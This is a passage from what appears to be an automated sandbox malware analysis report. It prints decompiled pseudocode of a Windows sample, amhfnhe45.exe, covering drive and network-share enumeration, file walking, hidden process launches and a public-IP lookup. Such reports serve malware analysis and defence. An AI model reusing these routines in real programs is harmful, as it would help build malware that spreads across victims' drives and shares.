InternetCloseHandle.WININET(00000000), ref: 0041BA97

Part of subcall function 0041BB40: InternetReadFile.WININET(?,?,?,?,00000000,00000000), ref: 0041BC50

InternetCloseHandle.WININET(00000000), ref: 0041BAFA
InternetCloseHandle.WININET(00000000), ref: 0041BAFD

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko, xrefs: 0041BA6C
http://ip.tyk.nu/, xrefs: 0041BA84

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00420160, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63

C-Code - Quality: 100%

			E00420160() {
				void _v8;
				long _v12;
				short _v15;
				void _v16;
				void* _t8;
				void* _t28;

				_v8 = 0;
				_t8 = CreateFileW("C:\Users\admin\AppData\Roaming\amhfnhe45.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
				_t28 = _t8;
				if(_t28 == 0xffffffff) {
					return 0;
				} else {
					SetFilePointer(_t28, 0x3c, 0, 0); // executed
					ReadFile(_t28,  &_v8, 2,  &_v12, 0); // executed
					SetFilePointer(_t28, _v8 + 0x58, 0, 0); // executed
					ReadFile(_t28,  &_v16, 4,  &_v12, 0); // executed
					CloseHandle(_t28);
					return _v15;
				}
			}

0x0042017d
0x00420184
0x0042018a
0x0042018f
0x004201ed
0x00420191
0x004201a0
0x004201b5
0x004201c4
0x004201d3
0x004201d6
0x004201e6
0x004201e6

APIs

CreateFileW.KERNEL32(C:\Users\admin\AppData\Roaming\amhfnhe45.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00420184
SetFilePointer.KERNELBASE(00000000,0000003C,00000000,00000000,00000000,7600CD44), ref: 004201A0
ReadFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 004201B5
SetFilePointer.KERNELBASE(00000000,-00000058,00000000,00000000), ref: 004201C4
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004201D3
CloseHandle.KERNEL32(00000000), ref: 004201D6

Strings

C:\Users\admin\AppData\Roaming\amhfnhe45.exe, xrefs: 00420178

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042B2F2, Relevance: 10.7, APIs: 7, Instructions: 196

C-Code - Quality: 78%

			E0042B2F2() {
				intOrPtr* _v8;
				void** _v12;
				struct _STARTUPINFOW _v80;
				signed int _t61;
				void* _t62;
				long _t65;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				int _t72;
				signed int _t73;
				intOrPtr* _t74;
				void* _t77;
				long _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				int _t93;
				signed char _t98;
				void* _t108;
				signed int _t110;
				signed int* _t111;
				int _t112;
				void** _t115;
				void** _t120;
				signed int _t121;

				GetStartupInfoW( &_v80);
				_push(0x40);
				_t112 = 0x20;
				_push(_t112); // executed
				_t61 = E0042D15F(); // executed
				if(_t61 != 0) {
					_t2 = _t61 + 0x800; // 0x800
					 *0x482280 = _t61;
					 *0x482274 = _t112;
					__eflags = _t61 - _t2;
					if(_t61 >= _t2) {
						L5:
						__eflags = _v80.cbReserved2;
						if(_v80.cbReserved2 == 0) {
							L27:
							_t91 = 0;
							__eflags = 0;
							do {
								_t115 = (_t91 << 6) +  *0x482280;
								_t62 =  *_t115;
								__eflags = _t62 - 0xffffffff;
								if(_t62 == 0xffffffff) {
									L31:
									_t115[1] = 0x81;
									__eflags = _t91;
									if(_t91 != 0) {
										_t50 = _t91 - 1; // -1
										asm("sbb eax, eax");
										_t65 =  ~_t50 + 0xfffffff5;
										__eflags = _t65;
									} else {
										_t65 = 0xfffffff6;
									}
									_t108 = GetStdHandle(_t65);
									__eflags = _t108 - 0xffffffff;
									if(_t108 == 0xffffffff) {
										L43:
										_t58 =  &(_t115[1]);
										 *_t58 = _t115[1] | 0x00000040;
										__eflags =  *_t58;
										 *_t115 = 0xfffffffe;
										goto L44;
									} else {
										__eflags = _t108;
										if(_t108 == 0) {
											goto L43;
										}
										_t69 = GetFileType(_t108);
										__eflags = _t69;
										if(_t69 == 0) {
											goto L43;
										}
										_t70 = _t69 & 0x000000ff;
										 *_t115 = _t108;
										__eflags = _t70 - 2;
										if(_t70 != 2) {
											__eflags = _t70 - 3;
											if(_t70 == 3) {
												_t53 =  &(_t115[1]);
												 *_t53 = _t115[1] | 0x00000008;
												__eflags =  *_t53;
											}
										} else {
											_t115[1] = _t115[1] | 0x00000040;
										}
										_t55 =  &(_t115[3]); // -4727412
										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
										__eflags = _t72;
										if(_t72 == 0) {
											L48:
											_t68 = _t72 | 0xffffffff;
											L46:
											return _t68;
										} else {
											_t115[2] = _t115[2] + 1;
											goto L44;
										}
									}
								}
								__eflags = _t62 - 0xfffffffe;
								if(_t62 == 0xfffffffe) {
									goto L31;
								}
								_t115[1] = _t115[1] | 0x00000080;
								L44:
								_t91 = _t91 + 1;
								__eflags = _t91 - 3;
							} while (_t91 < 3);
							SetHandleCount( *0x482274);
							_t68 = 0;
							__eflags = 0;
							goto L46;
						}
						_t73 = _v80.lpReserved2;
						__eflags = _t73;
						if(_t73 == 0) {
							goto L27;
						}
						_t93 =  *_t73;
						_t74 = _t73 + 4;
						_v8 = _t74;
						_v12 = _t74 + _t93;
						__eflags = _t93 - 0x800;
						if(_t93 >= 0x800) {
							_t93 = 0x800;
						}
						__eflags =  *0x482274 - _t93; // 0x20
						if(__eflags >= 0) {
							L18:
							_t110 = 0;
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L27;
							} else {
								goto L19;
							}
							do {
								L19:
								_t77 =  *_v12;
								__eflags = _t77 - 0xffffffff;
								if(_t77 == 0xffffffff) {
									goto L26;
								}
								__eflags = _t77 - 0xfffffffe;
								if(_t77 == 0xfffffffe) {
									goto L26;
								}
								_t98 =  *_v8;
								__eflags = _t98 & 0x00000001;
								if((_t98 & 0x00000001) == 0) {
									goto L26;
								}
								__eflags = _t98 & 0x00000008;
								if((_t98 & 0x00000008) != 0) {
									L24:
									_t120 = ((_t110 & 0x0000001f) << 6) + 0x482280[_t110 >> 5];
									 *_t120 =  *_v12;
									_t120[1] =  *_v8;
									_t40 =  &(_t120[3]); // 0xc
									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
									__eflags = _t72;
									if(_t72 == 0) {
										goto L48;
									}
									_t41 =  &(_t120[2]);
									 *_t41 = _t120[2] + 1;
									__eflags =  *_t41;
									goto L26;
								}
								_t85 = GetFileType(_t77);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L26;
								}
								goto L24;
								L26:
								_v12 =  &(_v12[1]);
								_t110 = _t110 + 1;
								_v8 = _v8 + 1;
								__eflags = _t110 - _t93;
							} while (_t110 < _t93);
							goto L27;
						} else {
							_t111 = 0x482284;
							while(1) {
								_t86 = E0042D15F(0x20, 0x40);
								__eflags = _t86;
								if(_t86 == 0) {
									break;
								}
								 *0x482274 =  *0x482274 + 0x20;
								_t16 = _t86 + 0x800; // 0x800
								 *_t111 = _t86;
								__eflags = _t86 - _t16;
								if(_t86 >= _t16) {
									L15:
									_t111 =  &(_t111[1]);
									__eflags =  *0x482274 - _t93; // 0x20
									if(__eflags < 0) {
										continue;
									}
									goto L18;
								}
								_t87 = _t86 + 5;
								__eflags = _t87;
								do {
									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
									 *((short*)(_t87 - 1)) = 0xa00;
									 *((short*)(_t87 + 0x20)) = 0xa0a;
									 *((char*)(_t87 + 0x2f)) = 0;
									_t87 = _t87 + 0x40;
									_t28 = _t87 - 5; // -74
									__eflags = _t28 -  *_t111 + 0x800;
								} while (_t28 <  *_t111 + 0x800);
								goto L15;
							}
							_t93 =  *0x482274; // 0x20
							goto L18;
						}
					}
					_t88 = _t61 + 5;
					__eflags = _t88;
					do {
						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
						 *((short*)(_t88 - 1)) = 0xa00;
						 *((intOrPtr*)(_t88 + 3)) = 0;
						 *((short*)(_t88 + 0x1f)) = 0xa00;
						 *((char*)(_t88 + 0x21)) = 0xa;
						 *((intOrPtr*)(_t88 + 0x33)) = 0;
						 *((char*)(_t88 + 0x2f)) = 0;
						_t121 =  *0x482280; // 0x14509f0
						_t88 = _t88 + 0x40;
						_t11 = _t88 - 5; // -74
						__eflags = _t11 - _t121 + 0x800;
					} while (_t11 < _t121 + 0x800);
					goto L5;
				}
				return _t61 | 0xffffffff;
			}

APIs

GetStartupInfoW.KERNEL32(?), ref: 0042B2FF

Part of subcall function 0042D15F: Sleep.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 0042D187

GetFileType.KERNEL32(?), ref: 0042B432
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042B468
GetStdHandle.KERNEL32(-000000F6), ref: 0042B4BC
GetFileType.KERNEL32(00000000), ref: 0042B4CE
InitializeCriticalSectionAndSpinCount.KERNEL32(-00482274,00000FA0), ref: 0042B4FC
SetHandleCount.KERNEL32 ref: 0042B525

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00413840, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156

C-Code - Quality: 95%

			E00413840() {
				signed int _v8;
				short _v1036;
				char _v1234;
				short _v1236;
				short _v1238;
				intOrPtr _v1242;
				intOrPtr _v1246;
				intOrPtr _v1250;
				intOrPtr _v1254;
				short _v1256;
				long _v1260;
				long _v1264;
				long _v1268;
				signed int _t35;
				intOrPtr _t38;
				WCHAR* _t45;
				WCHAR* _t46;
				int _t47;
				int _t50;
				WCHAR* _t51;
				signed int _t53;
				WCHAR* _t55;
				intOrPtr* _t60;
				intOrPtr* _t61;
				short _t63;
				short _t64;
				short _t65;
				short _t67;
				short _t68;
				short* _t71;
				short _t72;
				short _t73;
				WCHAR* _t75;
				intOrPtr* _t76;
				long _t78;
				signed int _t79;
				signed int _t81;
				void* _t82;
				void* _t83;
				void* _t92;
				void* _t93;
				void* _t94;

				_t81 = (_t79 & 0xfffffff8) - 0x4f4;
				_t35 =  *0x43f054; // 0xd6baf341
				_v8 = _t35 ^ _t81;
				E004233D0(0x442000, 3);
				_t38 =  *0x441d18; // 0x203ea08
				_t78 = 0;
				_t82 = _t81 + 8;
				if( *((intOrPtr*)(_t38 + 4)) == 0) {
					L36:
					ExitThread(1);
				}
				GetLogicalDriveStringsW(0x100,  &_v1036); // executed
				_t75 =  &_v1036;
				_v1236 = 0;
				E0042D0A0( &_v1234, 0, 0xc6);
				_t83 = _t82 + 0xc;
				_v1256 = 0;
				_v1254 = 0;
				_v1250 = 0;
				_v1246 = 0;
				_v1242 = 0;
				_v1238 = 0;
				_v1268 = 0;
				_v1264 = 0;
				_v1260 = 0;
				if(_v1036 == 0) {
					L33:
					E00413740(_t78);
					_t93 =  *0x462840 - _t78; // 0x0
					if(_t93 <= 0) {
						goto L36;
					}
					_t76 = 0x442040;
					do {
						E00413AB0(_t76, 1);
						_t78 = _t78 + 1;
						_t83 = _t83 + 8;
						_t76 = _t76 + 0x800;
						_t94 = _t78 -  *0x462840; // 0x0
					} while (_t94 < 0);
					goto L36;
				} else {
					do {
						_t60 = L"A:\\";
						_t45 = _t75;
						while(1) {
							_t67 =  *_t45;
							if(_t67 !=  *_t60) {
								break;
							}
							if(_t67 == _t78) {
								L8:
								_t45 = 0;
								L10:
								_t46 = _t75;
								if(_t45 != _t78) {
									_t61 = L"B:\\";
									while(1) {
										_t68 =  *_t46;
										if(_t68 !=  *_t61) {
											break;
										}
										if(_t68 == _t78) {
											L19:
											_t46 = 0;
											L21:
											if(_t46 != _t78) {
												_t47 = GetDriveTypeW(_t75); // executed
												if(_t47 == 3 || _t47 == 4 || _t47 == 2) {
													_t50 = GetVolumeInformationW(_t75,  &_v1236, 0xc8,  &_v1268,  &_v1264,  &_v1260,  &_v1256, 0x14); // executed
													if(_t50 == 1) {
														E00413AB0(_t75, _t50); // executed
														_t83 = _t83 + 8;
													}
												}
												_t51 = _t75;
												_t71 =  &(_t51[1]);
												do {
													_t63 =  *_t51;
													_t51 =  &(_t51[1]);
												} while (_t63 != _t78);
												goto L32;
											}
											_t55 = _t75;
											_t71 =  &(_t55[1]);
											do {
												_t64 =  *_t55;
												_t55 =  &(_t55[1]);
											} while (_t64 != _t78);
											goto L32;
										}
										_t72 = _t46[1];
										if(_t72 !=  *((intOrPtr*)(_t61 + 2))) {
											break;
										}
										_t46 =  &(_t46[2]);
										_t61 = _t61 + 4;
										if(_t72 != _t78) {
											continue;
										}
										goto L19;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									goto L21;
								}
								_t71 =  &(_t46[1]);
								do {
									_t65 =  *_t46;
									_t46 =  &(_t46[1]);
								} while (_t65 != _t78);
								goto L32;
							}
							_t73 = _t45[1];
							if(_t73 !=  *((intOrPtr*)(_t60 + 2))) {
								break;
							}
							_t45 =  &(_t45[2]);
							_t60 = _t60 + 4;
							if(_t73 != _t78) {
								continue;
							}
							goto L8;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L10;
						L32:
						_t53 = _t51 - _t71 >> 1;
						_t92 =  *(_t75 + 2 + _t53 * 2) - _t78;
						_t75 = _t75 + 2 + _t53 * 2;
					} while (_t92 != 0);
					goto L33;
				}
			}

0x00413848
0x0041384e
0x00413855
0x00413866
0x0041386b
0x00413870
0x00413872
0x00413878
0x00413a2b
0x00413a2d
0x00413a2d
0x0041388b
0x0041389e
0x004138a5
0x004138aa
0x004138b3
0x004138b6
0x004138bb
0x004138bf
0x004138c3
0x004138c7
0x004138cb
0x004138d0
0x004138d4
0x004138d8
0x004138e4
0x004139fe
0x004139ff
0x00413a04
0x00413a0a
0x00000000
0x00000000
0x00413a0c
0x00413a11
0x00413a14
0x00413a19
0x00413a1a
0x00413a1d
0x00413a23
0x00413a23
0x00000000
0x004138ea
0x004138f0
0x004138f0
0x004138f5
0x004138f7
0x004138f7
0x004138fd
0x00000000
0x00000000
0x00413902
0x00413919
0x00413919
0x00413922
0x00413924
0x00413926
0x00413940
0x00413945
0x00413945
0x0041394b
0x00000000
0x00000000
0x00413950
0x00413967
0x00413967
0x00413970
0x00413972
0x0041398e
0x00413997
0x004139c4
0x004139c9
0x004139cd
0x004139d2
0x004139d2
0x004139c9
0x004139d5
0x004139d7
0x004139e0
0x004139e0
0x004139e3
0x004139e6
0x00000000
0x004139e0
0x00413974
0x00413976
0x00413980
0x00413980
0x00413983
0x00413986
0x00000000
0x0041398b
0x00413952
0x0041395a
0x00000000
0x00000000
0x0041395c
0x0041395f
0x00413965
0x00000000
0x00000000
0x00000000
0x00413965
0x0041396b
0x0041396d
0x00000000
0x0041396d
0x00413928
0x00413930
0x00413930
0x00413933
0x00413936
0x00000000
0x0041393b
0x00413904
0x0041390c
0x00000000
0x00000000
0x0041390e
0x00413911
0x00413917
0x00000000
0x00000000
0x00000000
0x00413917
0x0041391d
0x0041391f
0x00000000
0x004139eb
0x004139ed
0x004139ef
0x004139f4
0x004139f4
0x00000000
0x004138f0

APIs

Part of subcall function 004233D0: GetTickCount.KERNEL32(?,?,?,?,0041386B,00442000,00000003), ref: 004233E1
Part of subcall function 004233D0: Sleep.KERNELBASE(0000000F), ref: 00423417

GetLogicalDriveStringsW.KERNELBASE(00000100,?), ref: 0041388B
GetDriveTypeW.KERNELBASE(?), ref: 0041398E
GetVolumeInformationW.KERNELBASE(?,?,000000C8,?,?,?,?,00000014), ref: 004139C4

Part of subcall function 00413740: WNetOpenEnumW.MPR(00000002,00000000,00000000,00413A04,00413A04), ref: 00413764
Part of subcall function 00413740: GlobalAlloc.KERNEL32(00000040,00004000), ref: 0041377D
Part of subcall function 00413740: WNetEnumResourceW.MPR(FFFFFFFF,FFFFFFFF,00000000,00004000), ref: 004137AE
Part of subcall function 00413740: GlobalFree.KERNEL32(00000000), ref: 0041381A
Part of subcall function 00413740: WNetCloseEnum.MPR(FFFFFFFF), ref: 00413824

Part of subcall function 00413AB0: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00442040,00000001,00000000), ref: 00413B47
Part of subcall function 00413AB0: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00413E1B
Part of subcall function 00413AB0: FindClose.KERNEL32(00000000), ref: 00413E2A

ExitThread.KERNEL32 ref: 00413A2D

Strings

B:\, xrefs: 00413940
A:\, xrefs: 004138F0

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041EF90, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63

C-Code - Quality: 72%

			E0041EF90(CHAR* _a4) {
				CHAR* _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v104;
				intOrPtr* _t14;
				intOrPtr* _t23;

				_t14 =  *0x48223c;
				_v12 = 0;
				if(_t14 != 0) {
					 *_t14( &_v12);
				}
				E0042D0A0( &_v104, 0, 0x44);
				_v104.wShowWindow = 0;
				_v104.dwFlags = 1;
				_v104.cb = 0x44;
				E00413000( &_v104, 0, 1, 0x46318ac7);
				CreateProcessA(0, _a4, 0, 0, 0, 0x20, 0, 0,  &_v104,  &_v28); // executed
				WaitForSingleObject(_v28.hProcess, 0x7530);
				CloseHandle(_v28);
				CloseHandle(_v28.hThread);
				Sleep(0x3e8); // executed
				_t23 =  *0x482240;
				if(_t23 != 0) {
					return  *_t23(_v12);
				}
				return _t23;
			}

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0041EFFA
WaitForSingleObject.KERNEL32(?,00007530), ref: 0041F005
CloseHandle.KERNEL32(?), ref: 0041F015
CloseHandle.KERNEL32(?), ref: 0041F01B
Sleep.KERNELBASE(000003E8), ref: 0041F022

Strings

D, xrefs: 0041EFD1

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041EEE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63

C-Code - Quality: 72%

			E0041EEE0(WCHAR* _a4) {
				WCHAR* _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v104;
				intOrPtr* _t14;
				intOrPtr* _t23;

				_t14 =  *0x48223c;
				_v12 = 0;
				if(_t14 != 0) {
					 *_t14( &_v12);
				}
				E0042D0A0( &_v104, 0, 0x44);
				_v104.wShowWindow = 0;
				_v104.dwFlags = 1;
				_v104.cb = 0x44;
				E00413000( &_v104, 0, 1, 0x46318ad1);
				CreateProcessW(0, _a4, 0, 0, 0, 0x20, 0, 0,  &_v104,  &_v28); // executed
				WaitForSingleObject(_v28.hProcess, 0x7530);
				CloseHandle(_v28);
				CloseHandle(_v28.hThread);
				Sleep(0x3e8); // executed
				_t23 =  *0x482240;
				if(_t23 != 0) {
					return  *_t23(_v12);
				}
				return _t23;
			}

APIs

CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0041EF4A
WaitForSingleObject.KERNEL32(?,00007530), ref: 0041EF55
CloseHandle.KERNEL32(?), ref: 0041EF65
CloseHandle.KERNEL32(?), ref: 0041EF6B
Sleep.KERNELBASE(000003E8), ref: 0041EF72

Strings

D, xrefs: 0041EF21

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042ADA7, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 220

C-Code - Quality: 100%

			E0042ADA7(intOrPtr _a4, wchar_t* _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				wchar_t* _v12;
				wchar_t* _v16;
				wchar_t* _v20;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				wchar_t* _t52;
				intOrPtr* _t53;
				int _t56;
				wchar_t* _t57;
				wchar_t* _t58;
				wchar_t* _t59;
				signed int _t60;
				wchar_t* _t61;
				wchar_t* _t63;
				wchar_t* _t64;
				wchar_t* _t65;
				wchar_t* _t67;
				wchar_t* _t68;
				wchar_t* _t72;
				wchar_t* _t73;
				wchar_t* _t74;
				wchar_t* _t75;
				signed int _t79;
				wchar_t* _t82;
				signed int _t90;
				void* _t91;
				wchar_t* _t92;
				wchar_t* _t93;
				long* _t94;
				void* _t95;
				void* _t97;

				_t48 =  *0x441278; // 0x0
				_t92 = _a8;
				_v8 = _t48;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				while( *_t92 == 0x20) {
					_t92 =  &(_t92[0]);
					__eflags = _t92;
				}
				_t49 =  *_t92 & 0x0000ffff;
				if(_t49 == 0x61) {
					_t79 = 0x109;
					L10:
					_t8 =  &_v8;
					 *_t8 = _v8 | 0x00000002;
					__eflags =  *_t8;
					L11:
					_t93 =  &(_t92[0]);
					_t50 =  *_t93 & 0x0000ffff;
					_t82 = 1;
					__eflags = _t50;
					if(_t50 == 0) {
						while(1) {
							L66:
							__eflags =  *_t93 - 0x20;
							if( *_t93 != 0x20) {
								break;
							}
							_t93 =  &(_t93[0]);
							__eflags = _t93;
						}
						__eflags =  *_t93;
						if(__eflags == 0) {
							_t52 = E0042EECB( &_a8, _a4, _t79, _a12, 0x180); // executed
							__eflags = _t52;
							if(_t52 == 0) {
								_t53 = _a16;
								 *0x440e58 =  &(( *0x440e58)[0]);
								__eflags =  *0x440e58;
								 *((intOrPtr*)(_t53 + 0xc)) = _v8;
								 *((intOrPtr*)(_t53 + 4)) = 0;
								 *_t53 = 0;
								 *((intOrPtr*)(_t53 + 8)) = 0;
								 *((intOrPtr*)(_t53 + 0x1c)) = 0;
								 *(_t53 + 0x10) = _a8;
								L72:
								return _t53;
							}
							L70:
							_t53 = 0;
							goto L72;
						}
						L68:
						 *((intOrPtr*)(E00427125(__eflags))) = 0x16;
						E004270D3();
						goto L70;
					}
					_t10 =  &(_t82[0x1f]); // 0x80
					_t90 = _t10;
					while(1) {
						__eflags = _t82;
						if(_t82 == 0) {
							break;
						}
						_t60 = _t50 & 0x0000ffff;
						__eflags = _t60 - 0x53;
						if(__eflags > 0) {
							_t61 = _t60 - 0x54;
							__eflags = _t61;
							if(_t61 == 0) {
								__eflags = 0x00001000 & _t79;
								if((0x00001000 & _t79) == 0) {
									_t79 = _t79 | 0x00001000;
									__eflags = _t79;
									L48:
									_t93 =  &(_t93[0]);
									_t50 =  *_t93 & 0x0000ffff;
									__eflags = _t50;
									if(_t50 != 0) {
										continue;
									}
									break;
								}
								L46:
								_t82 = 0;
								goto L48;
							}
							_t63 = _t61 - 0xe;
							__eflags = _t63;
							if(_t63 == 0) {
								__eflags = _t79 & 0x0000c000;
								if((_t79 & 0x0000c000) != 0) {
									goto L46;
								}
								_t79 = _t79 | 0x00008000;
								goto L48;
							}
							_t64 = _t63 - 1;
							__eflags = _t64;
							if(_t64 == 0) {
								__eflags = _v16;
								if(_v16 != 0) {
									goto L46;
								}
								_v8 = _v8 | 0x00004000;
								_v16 = 1;
								goto L48;
							}
							_t65 = _t64 - 0xb;
							__eflags = _t65;
							if(_t65 == 0) {
								__eflags = _v16;
								if(_v16 != 0) {
									goto L46;
								}
								_v8 = _v8 & 0xffffbfff;
								_v16 = 1;
								goto L48;
							}
							__eflags = _t65 - 6;
							if(__eflags != 0) {
								goto L68;
							}
							__eflags = _t79 & 0x0000c000;
							if((_t79 & 0x0000c000) != 0) {
								goto L46;
							}
							_t79 = _t79 | 0x00004000;
							goto L48;
						}
						if(__eflags == 0) {
							__eflags = _v12;
							if(_v12 != 0) {
								goto L46;
							}
							_v12 = 1;
							_t79 = _t79 | 0x00000020;
							goto L48;
						}
						_t67 = _t60 - 0x20;
						__eflags = _t67;
						if(_t67 == 0) {
							goto L48;
						}
						_t68 = _t67 - 0xb;
						__eflags = _t68;
						if(_t68 == 0) {
							__eflags = _t79 & 0x00000002;
							if((_t79 & 0x00000002) != 0) {
								goto L46;
							}
							_t79 = _t79 & 0xfffffffe | 0x00000002;
							_v8 = _v8 & 0xfffffffc | _t90;
							goto L48;
						}
						_t72 = _t68 - 1;
						__eflags = _t72;
						if(_t72 == 0) {
							_v20 = 1;
							goto L46;
						}
						_t73 = _t72 - 0x18;
						__eflags = _t73;
						if(_t73 == 0) {
							__eflags = _t79 & 0x00000040;
							if((_t79 & 0x00000040) != 0) {
								goto L46;
							}
							_t79 = _t79 | 0x00000040;
							goto L48;
						}
						_t74 = _t73 - 0xa;
						__eflags = _t74;
						if(_t74 == 0) {
							_t79 = _t79 | _t90;
							goto L48;
						}
						_t75 = _t74 - 4;
						__eflags = _t75;
						if(__eflags != 0) {
							goto L68;
						}
						__eflags = _v12 - _t75;
						if(_v12 != _t75) {
							goto L46;
						}
						_v12 = 1;
						_t79 = _t79 | 0x00000010;
						goto L48;
					}
					__eflags = _v20;
					if(_v20 == 0) {
						goto L66;
					}
					_t91 = 0x20;
					while(1) {
						__eflags =  *_t93 - _t91;
						if( *_t93 != _t91) {
							break;
						}
						_t93 =  &(_t93[0]);
						__eflags = _t93;
					}
					_t56 = wcsncmp("ccs", _t93, 3);
					_t97 = _t95 + 0xc;
					__eflags = _t56;
					if(__eflags != 0) {
						goto L68;
					}
					_t94 =  &(_t93[1]);
					while(1) {
						__eflags =  *_t94 - _t91;
						if( *_t94 != _t91) {
							break;
						}
						_t94 =  &(_t94[0]);
						__eflags = _t94;
					}
					__eflags =  *_t94 - 0x3d;
					if(__eflags != 0) {
						goto L68;
					} else {
						goto L58;
					}
					do {
						L58:
						_t94 =  &(_t94[0]);
						__eflags =  *_t94 - _t91;
					} while ( *_t94 == _t91);
					_t57 = E0042EFD0(_t94, L"UTF-8", 5);
					_t95 = _t97 + 0xc;
					__eflags = _t57;
					if(_t57 != 0) {
						_t58 = E0042EFD0(_t94, L"UTF-16LE", 8);
						_t95 = _t95 + 0xc;
						__eflags = _t58;
						if(_t58 != 0) {
							_t59 = E0042EFD0(_t94, L"UNICODE", 7);
							_t95 = _t95 + 0xc;
							__eflags = _t59;
							if(__eflags != 0) {
								goto L68;
							}
							_t93 =  &(_t94[3]);
							_t79 = _t79 | 0x00010000;
							goto L66;
						}
						_t93 =  &(_t94[4]);
						_t79 = _t79 | 0x00020000;
						goto L66;
					}
					_t93 =  &(_t94[2]);
					_t79 = _t79 | 0x00040000;
					goto L66;
				}
				if(_t49 == 0x72) {
					_t79 = 0;
					_v8 = _v8 | 0x00000001;
					goto L11;
				}
				_t101 = _t49 - 0x77;
				if(_t49 == 0x77) {
					_t79 = 0x301;
					goto L10;
				}
				 *((intOrPtr*)(E00427125(_t101))) = 0x16;
				E004270D3();
				return 0;
			}

APIs

wcsncmp.NTDLL(ccs,?,00000003,00000000), ref: 0042AF71

Strings

UNICODE, xrefs: 0042AFDC
ccs, xrefs: 0042AF6C
UTF-8, xrefs: 0042AF9E
UTF-16LE, xrefs: 0042AFBD

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041CE49, Relevance: 7.6, APIs: 5, Instructions: 75

C-Code - Quality: 39%

			E0041CE49(void* __ebx, void* __ebp, void* _a24, void* _a28, char _a72, intOrPtr* _a80, struct _MEMORYSTATUS _a164, void* _a1040, signed int _a2168) {
				void* __edi;
				intOrPtr* _t18;
				intOrPtr _t23;
				intOrPtr* _t24;
				intOrPtr _t26;
				intOrPtr* _t27;
				void* _t34;
				void* _t35;
				struct HINSTANCE__* _t44;
				void* _t45;
				void* _t46;
				signed int _t49;
				long long* _t50;
				long long* _t52;
				long long* _t53;
				long long _t62;

				_t34 = __ebx;
				do {
					_t62 =  *0x43bed0;
					_t50 = _t49 - 8;
					 *_t50 = _t62;
					E0041C8B0(_a1040,  &_a1040);
					_t43 = _a28;
					_t49 = _t50 + 8;
				} while (Module32Next(_a28,  &_a1040) != 0 && GetTickCount() < _t34);
				_t18 = _a80;
				if(_t18 == 0) {
					_t43 = _a24;
					CloseHandle(_a24);
				} else {
					 *_t18(_a24);
				}
				FreeLibrary(_t44);
				E0041CF50(_t62);
				GlobalMemoryStatus( &_a164);
				_t23 =  *0x462890; // 0x440288
				if(_t23 == 0) {
					_t23 = 0x440288;
					 *0x462890 = 0x440288;
				}
